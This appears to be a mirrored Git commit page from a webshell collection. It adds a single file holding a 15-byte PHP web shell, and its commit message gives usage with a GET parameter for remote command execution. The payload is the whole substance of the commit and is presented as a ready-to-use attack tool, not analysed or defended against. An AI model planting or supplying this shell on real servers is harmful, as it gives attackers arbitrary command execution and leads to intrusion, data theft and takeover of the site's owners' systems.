mirror of
https://github.com/tennc/webshell
synced 2024-11-22 03:03:03 +00:00
15 bytes long PHP payload to achieve RCE!
Usage: http://127.0.0.1/?_=ls
This commit is contained in:
parent
6a095d49ac
commit
e12f91f024
1 changed files with 1 additions and 0 deletions
1
php/20220207.php
Normal file
1
php/20220207.php
Normal file
|
@ -0,0 +1 @@
|
|||
<?=`$_GET[_]`?>
|
Loading…
Reference in a new issue